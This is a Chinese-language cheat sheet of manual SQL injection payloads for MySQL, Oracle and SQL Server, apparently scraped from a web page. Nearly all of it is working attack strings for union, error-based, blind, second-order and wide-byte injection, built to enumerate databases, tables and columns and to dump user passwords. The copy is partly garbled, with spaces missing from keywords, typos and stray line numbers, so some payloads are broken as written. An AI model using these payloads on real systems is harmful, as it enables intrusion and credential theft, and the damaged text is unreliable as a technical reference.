?id=1' order by 4--+ ?id=0'unionselect1,2,3,database()--+ ?id=0' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() --+ ?id=0'unionselect1,2,3,group_concat(column_name) from information_schema.columns where table_name="users" --+ #group_concat(column_name) 可替换为 unhex(Hex(cast(column_name+as+char)))column_name
?id=0' union select 1,2,3,group_concat(password) from users --+ #group_concat 可替换为 concat_ws(',',id,users,password )
?id=0'unionselect1,2,3,password from users limit 0,1--+
1.2 报错注入
1.floor()
1
select*from test where id=1and (select1from (selectcount(*),concat(user(),floor(rand(0)*2))x from information_schema.tables groupby x)a);
2.extractvalue()
1
select*from test where id=1and (extractvalue(1,concat(0x7e,(selectuser()),0x7e)));
3.updatexml()
1
select*from test where id=1and (updatexml(1,concat(0x7e,(selectuser()),0x7e),1));
4.geometrycollection()(5.1>=version<=5.5.48 )
1
select*from test where id=1and geometrycollection((select*from(select*from(select database())a)b));
5.multipoint()(5.1>=version<=5.5.48 )
1
select*from test where id=1and multipoint((select*from(select*from(selectuser())a)b));
6.polygon()(5.1>=version<=5.5.48 )
1
select*from test where id=1and polygon((select*from(select*from(selectuser())a)b));
7.multipolygon()(5.1>=version<=5.5.48 )
1
select*from test where id=1and multipolygon((select*from(select*from(selectuser())a)b));
8.linestring()(5.1>=version<=5.5.48 )
1
select*from test where id=1and linestring((select*from(select*from(selectuser())a)b));
9.multilinestring()(5.1>=version<=5.5.48 )
1
select*from test where id=1and multilinestring((select*from(select*from(selectuser())a)b));
10.exp()(5.1>=version<=5.5.48 )
1
select*from test where id=1andexp(~(select*from(selectuser())a));
爆库:?id=1' and updatexml(1,(select concat(0x7e,(schema_name),0x7e) from information_schema.schemata limit 2,1),1) -- + 爆表:?id=1' and updatexml(1,(select concat(0x7e,(table_name),0x7e) from information_schema.tables where table_schema='security' limit 3,1),1) -- + 爆字段:?id=1' and updatexml(1,(select concat(0x7e,(column_name),0x7e) from information_schema.columns where table_name=0x7573657273 limit 2,1),1) -- + 爆数据:?id=1' and updatexml(1,(select concat(0x7e,password,0x7e) from users limit 1,1),1) -- +
#concat 也可以放在外面 updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1)
mysql> select * from admin; +—-+———–+——-+ | id | name | pass | +—-+———–+——-+ | 1 | admin | admin | | 2 | admin’111 | 11111 | | 3 | admin’–+ | 11 | +—-+———–+——-+ 4 rows in set (0.00 sec) 二次注入在没有源码的情况比较难发现,通常见于注册,登录恶意账户后,数据库可能会因为恶意账户名的问题,将 admin’–+ 误认为 admin 账户
宽字节注入:针对目标做了一定的防护,单引号转变为 ' , mysql 会将 \ 编码为 %5c ,宽字节中两个字节代表一个汉字,所以把 %df 加上 %5c 就变成了一个汉字“運”,使用这种方法成功绕过转义,就是所谓的宽字节注入 id=-1%df’ union select…
没使用宽字节 %27 -> %5C%27
使用宽字节 %df%27 -> %df%5c%27 -> 運’
0x02 Oracle 手工注入
2.1 联合注入
1 2 3 4 5 6
?id=-1' union select user,null from dual-- ?id=-1'unionselect version,nullfrom v$instance-- ?id=-1' union select table_name,null from (select * from (select rownum as limit,table_name from user_tables) where limit=3)-- ?id=-1'unionselect column_name,nullfrom (select*from (select rownum as limit,column_name from user_tab_columns where table_name ='USERS') where limit=2)-- ?id=-1' union select username,passwd from users-- ?id=-1'unionselect username,passwd from (select*from (select username,passwd,rownum as limit from users) where limit=3)--
2.2 报错注入
1 2 3 4 5
?id=1' and 1=ctxsys.drithsx.sn(1,(select user from dual))-- ?id=1'and1=ctxsys.drithsx.sn(1,(select banner from v$version where banner like'Oracle%))-- ?id=1'and1=ctxsys.drithsx.sn(1,(select table_name from (select rownum as limit,table_name from user_tables) where limit=3))-- ?id=1' and 1=ctxsys.drithsx.sn(1,(select column_name from (select rownum as limit,column_name from user_tab_columns where table_name ='USERS') where limit=3))-- ?id=1'and1=ctxsys.drithsx.sn(1,(select passwd from (select passwd,rownum as limit from users) where limit=1))-
2.3 盲注
2.3.1 布尔盲注
既然是盲注,那么肯定涉及到条件判断语句,Oracle除了使用IF the else end if这种复杂的,还可以使用 decode() 函数。 语法:decode(条件,值1,返回值1,值2,返回值2,…值n,返回值n,缺省值);
该函数的含义如下: IF 条件=值1 THEN RETURN(返回值1) ELSIF 条件=值2 THEN RETURN(返回值2) …… ELSIF 条件=值n THEN RETURN(返回值n) ELSE RETURN(缺省值) END IF ?id=1’ and 1=(select decode(user,’SYSTEM’,1,0,0) from dual)– ?id=1’ and 1=(select decode(substr(user,1,1),’S’,1,0,0) from dual)– ?id=1’ and ascii(substr(user,1,1))> 64– #二分法
?id=1' and 1=(case when ascii(substr(user,1,1))> 128 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)-- ?id=1' and 1=(case when ascii(substr(user,1,1))> 64 then DBMS_PIPE.RECEIVE_MESSAGE('a',5) else 1 end)--
0x03 SQL server 手工注入
3.1 联合注入
1 2 3 4 5 6 7 8
?id=-1' union select null,null-- ?id=-1'unionselect @@servername, @@version-- ?id=-1' union select db_name(),suser_sname()-- ?id=-1'unionselect (select top 1 name from sys.databases where name notin (select top 6 name from sys.databases)),null-- ?id=-1' union select (select top 1 name from sys.databases where name not in (select top 7 name from sys.databasesl),null-- ?id--1'unionselect (select top 1 table_ name from information_schema.tables where table_name notin (select top 0 table_name from information_schema.tables)),null-- ?id=-1' union select (select top 1 column name from information_schema.columns where table_name='users' and column_name not in (select top 1 column_name from information_schema.columns where table_name = 'users')),null--- ?id=-1'unionselect (select top 1 username from users where username notin (select top 3 username from users)),null--
3.2 报错注入
?id=1' and 1=(select 1/@@servername)-- ?id=1' and 1=(select 1/(select top 1 name from sys.databases where name not in (select top 1 name from sys.databases))--
3.3 盲注
3.3.1 布尔盲注
?id=1' and ascii(substring((select db_ name(1)),1,1))> 64--